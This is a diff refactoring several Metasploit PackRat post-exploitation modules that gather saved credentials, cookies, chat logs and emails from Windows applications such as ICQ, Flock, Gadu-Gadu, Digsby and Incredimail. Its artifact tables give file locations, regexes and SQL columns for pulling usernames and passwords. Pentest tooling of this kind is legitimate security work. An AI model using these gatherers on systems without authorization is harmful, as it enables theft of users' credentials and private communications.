-                              "description": "Digsby's saved Username &amp; Passwords",
-                              "credential_type": 'text',
-                              "regex_search": [
-                                {
-                                  "extraction_description": 'Searches for credentials (USERNAMES/PASSWORDS)',
-                                  "extraction_type": 'credentials',
-                                  "regex": [
-                                    '(?i-mx:password.*)',
-                                    '(?i-mx:username.*)'
-                                  ]
-                                },
-                                {
-                                  "extraction_description": 'searches for Email TO/FROM address',
-                                  "extraction_type": 'Email addresses',
-                                  "regex": [
-                                    '(?i-mx:to:.*)',
-                                    '(?i-mx:from:.*)'
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Digsby credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Digsby credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -70,9 +78,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -85,7 +95,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/digsby.rb
+++ b/modules/post/windows/gather/credentials/digsby.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/flock.rb
+++ b/modules/post/windows/gather/credentials/flock.rb
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/flock.rb
+++ b/modules/post/windows/gather/credentials/flock.rb
@@ -10,80 +10,89 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'flock',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Flock',
+          artifact_file_name: 'formhistory.sqlite',
+          description: "Flock's saved Username and Passwords ",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'logins',
+              sql_column: 'username_value, action_url'
+            }
+          ]
+        },
+        {
+          filetypes: 'Cookies',
+          path: 'AppData',
+          dir: 'Flock',
+          artifact_file_name: 'cookies.sqlite',
+          description: "Flock's cookies file",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports SRware's Login data",
+              sql_table: 'cookies',
+              sql_column: 'host_key, name, path'
+            }
+          ]
+        },
+        {
+          filetypes: 'email',
+          path: 'AppData',
+          dir: 'Flock',
+          artifact_file_name: '*.log',
+          description: 'Log email',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'searches for Email addresses within the log files',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:email.*")'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Flock credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for credentials stored in Flock on a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'flock',
-                          "app_category": 'browsers',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'logins',
-                              "path": 'AppData',
-                              "dir": 'Flock',
-                              "artifact_file_name": 'formhistory.sqlite',
-                              "description": "Flock's saved Username and Passwords ",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": 'logins',
-                                  "sql_column": 'username_value, action_url'
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'Cookies',
-                              "path": 'AppData',
-                              "dir": 'Flock',
-                              "artifact_file_name": 'cookies.sqlite',
-                              "description": "Flock's cookies file",
-                              "credential_type": 'sqlite',
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports SRware's Login data",
-                                  "sql_table": 'cookies',
-                                  "sql_column": 'host_key, name, path'
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'email',
-                              "path": 'AppData',
-                              "dir": 'Flock',
-                              "artifact_file_name": '*.log',
-                              "description": 'Log email',
-                              "credential_type": 'text',
-                              "regex_search": [
-                                {
-                                  "extraction_description": 'searches for Email addresses within the log files',
-                                  "extraction_type": 'Email addresses',
-                                  "regex": [
-                                    '(?i-mx:email.*")'
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Flock credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials stored in Flock on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -91,9 +100,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -106,7 +117,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/gadugadu.rb
+++ b/modules/post/windows/gather/credentials/gadugadu.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/gadugadu.rb
+++ b/modules/post/windows/gather/credentials/gadugadu.rb
@@ -10,60 +10,69 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'gadugadu',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'chat_logs',
+          path: 'GG dysk',
+          dir: 'Galeria',
+          artifact_file_name: 'Thumbs.db',
+          description: 'Saved GaduGadu User Profile Images in Thumbs.db file',
+          credential_type: 'image'
+        },
+        {
+          filetypes: 'chat_logs',
+          path: 'AppData',
+          dir: 'GG',
+          artifact_file_name: 'profile.ini',
+          description: 'GaduGadu profile User information : Rename long saved artifactto in profile.ini',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:name=.*)',
+                '(?i-mx:login=.*)',
+                '(?i-mx:path=.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Gadugadu credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-        This is a module that searches for Gadugadu credentials on a windows remote host. Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'gadugadu',
-                          "app_category": 'chats',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'chat_logs',
-                              "path": 'GG dysk',
-                              "dir": 'Galeria',
-                              "artifact_file_name": 'Thumbs.db',
-                              "description": 'Saved GaduGadu User Profile Images in Thumbs.db file',
-                              "credential_type": 'image'
-                            },
-                            {
-                              "filetypes": 'chat_logs',
-                              "path": 'AppData',
-                              "dir": 'GG',
-                              "artifact_file_name": 'profile.ini',
-                              "description": 'GaduGadu profile User information : Rename long saved artifactto in profile.ini',
-                              "credential_type": 'text',
-                              "regex_search": [
-                                {
-                                  "extraction_description": 'Searches for credentials (USERNAMES/PASSWORDS)',
-                                  "extraction_type": 'credentials',
-                                  "regex": [
-                                    '(?i-mx:name=.*)',
-                                    '(?i-mx:login=.*)',
-                                    '(?i-mx:path=.*)'
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Gadugadu credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Gadugadu credentials on a windows remote host. Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -71,9 +80,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -86,7 +97,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/icq.rb
+++ b/modules/post/windows/gather/credentials/icq.rb
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/icq.rb
+++ b/modules/post/windows/gather/credentials/icq.rb
@@ -10,85 +10,94 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'ICQ',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'ICQ',
+          artifact_file_name: 'Owner.mdb',
+          description: "ICQ's saved Username and Passwords",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'chat_logs',
+          path: 'AppData',
+          dir: 'ICQ',
+          artifact_file_name: 'Messages.mdb',
+          description: "ICQ's chat logs",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'ICQ credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for ICQ credentials on a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'ICQ',
-                          "app_category": 'chats',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'logins',
-                              "path": 'AppData',
-                              "dir": 'ICQ',
-                              "artifact_file_name": 'Owner.mdb',
-                              "description": "ICQ's saved Username and Passwords",
-                              "credential_type": 'text',
-                              "regex_search": [
-                                {
-                                  "extraction_description": 'Searches for credentials (USERNAMES/PASSWORDS)',
-                                  "extraction_type": 'credentials',
-                                  "regex": [
-                                    '(?i-mx:password.*)',
-                                    '(?i-mx:username.*)'
-                                  ]
-                                },
-                                {
-                                  "extraction_description": 'searches for Email TO/FROM address',
-                                  "extraction_type": 'Email addresses',
-                                  "regex": [
-                                    '(?i-mx:to:.*)',
-                                    '(?i-mx:from:.*)'
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": 'chat_logs',
-                              "path": 'AppData',
-                              "dir": 'ICQ',
-                              "artifact_file_name": 'Messages.mdb',
-                              "description": "ICQ's chat logs",
-                              "credential_type": 'text',
-                              "regex_search": [
-                                {
-                                  "extraction_description": 'Searches for credentials (USERNAMES/PASSWORDS)',
-                                  "extraction_type": 'credentials',
-                                  "regex": [
-                                    '(?i-mx:password.*)',
-                                    '(?i-mx:username.*)'
-                                  ]
-                                },
-                                {
-                                  "extraction_description": 'searches for Email TO/FROM address',
-                                  "extraction_type": 'Email addresses',
-                                  "regex": [
-                                    '(?i-mx:to:.*)',
-                                    '(?i-mx:from:.*)'
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'ICQ credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for ICQ credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -96,9 +105,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -111,7 +122,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/ie.rb
+++ b/modules/post/windows/gather/credentials/ie.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/ie.rb
+++ b/modules/post/windows/gather/credentials/ie.rb
@@ -10,41 +10,50 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'IE',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'web_history',
+          path: 'LocalSettings',
+          dir: 'History',
+          artifact_file_name: 'index.dat',
+          description: 'IE history',
+          credential_type: 'dat'
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Ie credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for ie credentials on a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'IE',
-                          "app_category": 'browsers',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'web_history',
-                              "path": 'LocalSettings',
-                              "dir": 'History',
-                              "artifact_file_name": 'index.dat',
-                              "description": 'IE history',
-                              "credential_type": 'dat'
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Ie credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for ie credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -52,9 +61,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -67,7 +78,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/incredimail.rb
+++ b/modules/post/windows/gather/credentials/incredimail.rb
@@ -11,58 +11,68 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'incredimail',
+      app_category: 'emails',
+      gatherable_artifacts: [
+        {
+          filetypes: 'email_logs',
+          path: 'LocalAppData',
+          dir: 'IM',
+          artifact_file_name: 'msg.iml',
+          description: 'IncrediMail sent and received emails',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Incredimail credential gatherer',
-                      'Description' => "
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Incredimail credentials on a windows remote host.
-      ",
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": 'incredimail',
-                          "app_category": 'emails',
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": 'email_logs',
-                              "path": 'LocalAppData',
-                              "dir": 'IM',
-                              "artifact_file_name": 'msg.iml',
-                              "description": 'IncrediMail sent and received emails',
-                              "credential_type": 'text',
-                              "regex_search": [
-                                {
-                                  "extraction_description": 'Searches for credentials (USERNAMES/PASSWORDS)',
-                                  "extraction_type": 'credentials',
-                                  "regex": [
-                                    '(?i-mx:password.*)',
-                                    '(?i-mx:username.*)'
-                                  ]
-                                },
-                                {
-                                  "extraction_description": 'searches for Email TO/FROM address',
-                                  "extraction_type": 'Email addresses',
-                                  "regex": [
-                                    '(?i-mx:to:.*)',
-                                    '(?i-mx:from:.*)'
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }))
+    super(
+      update_info(
+        info,
+        'Name' => 'Incredimail credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Incredimail credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -70,9 +80,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
-                                                                                  k[:filetypes]
-                                                                                end.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
       ]
     )
   end
@@ -85,7 +97,7 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'

--- a/modules/post/windows/gather/credentials/incredimail.rb
+++ b/modules/post/windows/gather/credentials/incredimail.rb
@@ -4,46 +4,45 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+ARTIFACTS =
+  {
+    application: 'incredimail',
+    app_category: 'emails',
+    gatherable_artifacts: [
+      {
+        filetypes: 'email_logs',
+        path: 'LocalAppData',
+        dir: 'IM',
+        artifact_file_name: 'msg.iml',
+        description: 'IncrediMail sent and received emails',
